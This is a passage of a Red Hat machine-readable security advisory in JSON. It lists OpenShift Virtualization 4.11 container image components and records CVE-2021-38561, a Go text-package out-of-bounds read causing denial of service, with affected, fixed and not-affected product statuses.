"product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64"
},
"product_reference": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64"
},
"product_reference": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64"
},
"product_reference": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64"
},
"product_reference": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64"
},
"product_reference": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64"
},
"product_reference": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64"
},
"product_reference": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64"
},
"product_reference": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64"
},
"product_reference": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
},
"product_reference": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-38561",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2022-06-23T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2100495"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang\u0027s library. The overall DoS attack vector depends directly on how the library\u0027s input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
